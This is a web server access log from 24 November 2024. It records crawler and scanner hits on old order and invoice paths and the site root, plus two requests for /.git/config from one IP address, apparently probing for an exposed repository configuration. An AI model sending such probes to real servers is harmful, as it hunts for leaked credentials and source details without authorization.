156.59.198.135 - - [24/Nov/2024:09:13:12 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202002032103_RenOrder.xml HTTP/1.0" 404 328 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
178.205.228.248 - - [24/Nov/2024:09:16:39 +0100] "GET / HTTP/1.0" 200 423 "-" "Mozilla/5.0 (Linux; U; Android 4.0.3; ko-kr; LG-L160L Build/IML74K) AppleWebkit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30"
156.59.198.136 - - [24/Nov/2024:09:17:12 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202010161203_RenOrder.xml HTTP/1.0" 404 328 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
175.100.48.34 - - [24/Nov/2024:09:21:35 +0100] "GET / HTTP/1.1" 200 423 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
147.185.132.216 - - [24/Nov/2024:09:40:19 +0100] "GET / HTTP/1.0" 200 423 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
156.59.198.136 - - [24/Nov/2024:09:41:42 +0100] "GET /docs/ecommlogistics/belege/RE16-000020.pdf HTTP/1.0" 404 306 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
154.213.184.43 - - [24/Nov/2024:09:41:56 +0100] "GET / HTTP/1.1" 200 423 "-" "-"
156.59.198.136 - - [24/Nov/2024:09:45:42 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202103091503_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [24/Nov/2024:09:49:43 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202104131803_RenOrder.xml HTTP/1.0" 404 328 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [24/Nov/2024:09:53:43 +0100] "GET /renault.activities.at/htdocs/binaries/10462869.pdf HTTP/1.0" 404 311 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
195.178.110.57 - - [24/Nov/2024:10:24:32 +0100] "GET /.git/config HTTP/1.1" 404 285 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36"
195.178.110.57 - - [24/Nov/2024:10:24:51 +0100] "GET /.git/config HTTP/1.1" 404 285 "-" "Mozilla/5.0 (OS/2; Warp 4.5; rv:10.0.12) Gecko/20130108 Firefox/10.0.12 SeaMonkey/2.7.2"
